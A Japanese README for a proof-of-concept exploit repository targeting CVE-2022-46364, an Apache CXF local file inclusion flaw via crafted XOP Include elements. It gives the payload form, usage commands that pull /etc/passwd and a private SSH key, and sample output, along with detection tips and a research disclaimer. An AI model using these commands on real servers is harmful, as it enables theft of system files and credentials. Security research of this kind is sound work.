
CVE-2022-46364 の概念実証エクスプロイト。Apache CXF における、SOAP リクエスト内で細工された XOP Include 要素を介したローカルファイルインクルージョンの脆弱性です。任意のサーバーファイルを読み取るための Bash エクスプロイトスクリプトが含まれています。
このリポジトリには、CVE-2022-46364(Apache CXF におけるローカルファイルインクルージョン(LFI)の脆弱性)の Proof-of-Concept(PoC)エクスプロイトが含まれています。
この脆弱性は、SOAP リクエスト内の XOP(XML-binary Optimized Packaging)Include 要素の不適切な処理に起因し、攻撃者がサーバー上の任意のファイルを読み取ることを可能にします。
Apache CXF は、SOAP リクエスト内の <xop:Include> 要素を不適切に処理します。
細工された href(例: file:///etc/passwd)を指定することで、サーバーがローカルファイルの内容を読み込み、応答に含める可能性があります。
ターゲット環境で実際に脆弱なバージョンを必ず確認してください。
<xop:Include href="file:///path/to/file"> を含める.
├── cxf_lfi.sh # エクスプロイトスクリプト
├── README.md # ドキュメント
├── LICENSE # MIT ライセンス
└── .gitignore
chmod +x cxf_lfi.sh
スクリプト内のターゲットを更新します:
TARGET="http://<TARGET_IP>:8080/employeeservice"
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///etc/passwd
./cxf_lfi.sh file:///home/user/.ssh/id_rsa
[+] Target: http://10.10.10.10:8080/employeeservice
[+] File: file:///etc/passwd
[+] Extracted Content:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
一部のサーバーでは:
file:// スキームがサニタイズまたはブロックされる場合がある出力の解析は応答形式に依存し、手動での確認が必要になる場合があります。
以下を含む不審な SOAP リクエストを監視する:
<xop:Include>file:// URIこのプロジェクトは以下の目的を意図しています:
明示的な許可なく、このツールをシステムで使用しないでください。
セキュリティ研究および CTF 練習の一環として開発されました。